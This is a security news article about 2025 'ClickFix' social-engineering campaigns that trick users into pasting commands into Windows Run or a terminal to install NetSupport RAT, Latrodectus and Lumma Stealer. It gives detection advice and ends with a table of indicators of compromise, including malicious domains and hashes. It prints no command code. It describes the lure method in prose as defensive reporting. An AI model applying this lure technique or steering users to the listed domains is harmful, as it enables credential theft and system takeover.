A new wave of sophisticated cyberattacks leveraging the “ClickFix” technique is providing threat actors with unprecedented capabilities to compromise a wide swath of organizations.
Throughout 2025, security researchers have observed an uptick in high-profile campaigns distributing NetSupport RAT, Latrodectus malware, and Lumma Stealer, all utilizing variants of ClickFix to gain initial access and establish persistence within enterprise environments.
ClickFix Technique Empowers Threat Actors
ClickFix is a deceptive social engineering method that exploits users’ trust in “quick fix” solutions for common computer problems.
Under the guise of addressing mundane issues like missing drivers or pop-up errors, threat actors instruct users to copy and execute malicious commands via the Windows Run dialog (Win+R) or a terminal session (Win+X).
These commands are often injected into the user’s clipboard by malicious JavaScript hosted on compromised websites, malvertising networks, fake tech support forums, or seemingly legitimate video tutorials a technique also dubbed “pastejacking.”
The superficial credibility of these lures is reinforced by impersonating trusted brands such as DocuSign and Okta, further obscuring the malicious intent and making detection more challenging for both users and security systems.
Researchers have documented how these attacks evade traditional security controls by bypassing the need for exploit delivery, malicious attachments, or phishing links.
Instead, the user is socially engineered into manually executing the attacker’s payload through trusted system interfaces.
This method not only complicates automated detection but also leaves telling forensic traces, such as entries in the Windows RunMRU registry or evidence of PowerShell sessions spawned via Win+X after clipboard pasting.
Full Control of Targeted Organizations
Several major malware families have integrated ClickFix into their delivery chains in 2025.
A NetSupport RAT campaign in May targeted sectors ranging from healthcare and legal services to telecommunications and mining, leveraging fake DocuSign and Okta pages to trick users into running obfuscated PowerShell commands.
These scripts typically download malicious loaders and RAT payloads, often masquerading as legitimate runtime dependencies.
Latrodectus operators have also evolved, using compromised websites and ClearFake infrastructure to inject PowerShell commands that ultimately deploy the malware through side-loaded DLLs.
Meanwhile, Lumma Stealer campaigns have expanded into IT, automotive, and energy sectors, employing unique MSHTA commands tied to individually tracked payloads, and using typosquatted domains that mimic legitimate IP logging services.
The impact of ClickFix campaigns is particularly alarming: initial access, credential theft, mail exfiltration, endpoint takeover, and even ransomware deployment.
Sectors affected include high technology, financial services, manufacturing, retail, government, and utilities.
Incident response teams, such as Palo Alto Networks’ Unit 42, report a notable rise in compromises initiated through ClickFix lures, underscoring the need for proactive defense.
Detection and mitigation strategies hinge on a combination of user awareness, endpoint monitoring, and forensic analysis.
Analysts are encouraged to monitor Windows event logs for suspicious process creation, scrutinize RunMRU registry artifacts for obfuscated or anomalous commands, and correlate clipboard activity with subsequent PowerShell or MSHTA executions.
Security solutions such as Advanced WildFire, Advanced URL Filtering, DNS Security, and endpoint detection and response platforms like Cortex XDR offer layered defenses, while ongoing user education remains critical in reducing the success of these social engineering attacks.
As the ClickFix phenomenon continues to proliferate and adapt, organizations must remain vigilant, combining technical controls with robust incident response and cyber hygiene practices to mitigate the risk of these highly effective social engineering campaigns.
Indicators of Compromise (IOCs)
| Threat | File Name | SHA256 Hash | Domains/IPs |
|---|---|---|---|
| Lumma Stealer | PartyContinued.exe | 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef | iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev, pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev, pub-a5a2932dc7f143499b865f8580102688.r2[.]dev, agroeconb[.]live, animatcxju[.]live |
| Latrodectus | libecf.dll | 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1 | webbs[.]live, diab[.]live, mhbr[.]live, decr[.]live, lexip[.]live, rimz[.]live, byjs[.]live, btco[.]live, izan[.]live, k.veuwb[.]live, r.netluc[.]live, heyues[.]live, k.mailam[.]live |
| NetSupport RAT | msvcp140.dll | CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527 | oktacheck.it[.]com, doccsign.it[.]com, docusign.sa[.]com, dosign.it[.]com, loyalcompany[.]net, leocompany[.]org, mhousecreative[.]com, mh-sns[.]com, lasix20[.]com |
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
![Pinterest](https://pinterest.com/pin/create/button/?url=https://cyberpress.org/clickfix-technique-empowers-threat-actors/&media=https://i1.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg66SMLrgt032iXov-TIj1-Bcw89SAr8crivsPSLRGxVYQGX9FA1gxnK4aOd4hhyQOHwjC85Cwzp81hZnGL-6XovGXB1pHYUXD11PscIlk7n4TMJdR_SpAhvsMG4SsLjy081YiY9U_IJ88N6zAvifu3blaZkBAzDspqJhkDsxs-kGU3Ujlt0UO_-85BYsk/s16000/ClickFix.webp?resize=1068,580&ssl=1&description=A new wave of sophisticated cyberattacks leveraging the "ClickFix" technique is providing threat actors with unprecedented capabilities.){kind=link}